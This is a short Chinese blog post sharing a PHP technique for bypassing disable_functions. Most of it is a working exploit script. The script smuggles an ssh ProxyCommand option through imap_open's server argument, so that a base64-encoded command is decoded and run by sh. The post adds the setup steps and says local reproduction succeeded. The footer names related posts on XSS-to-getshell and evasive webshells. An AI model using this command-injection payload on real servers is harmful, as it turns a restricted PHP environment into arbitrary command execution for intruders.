看到一个新的Bypass disable function姿势
<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
本地复现成功,debain9 php7.0环境,需要一个imap扩展
apt-get install php-imap
From:
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_ima … /master/exploit.php
https://www.t00ls.net/thread-48531-1-1.html
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er
赞 (0)
Y4er 
微信扫一扫 
支付宝扫一扫
宝塔面板6.x版本前台存储xss+后台csrf组合拳getshell
« 上一篇
2018年11月8日 pm8:29
PHP免杀大马的奇淫技巧
下一篇 »
2018年11月17日 pm10:48
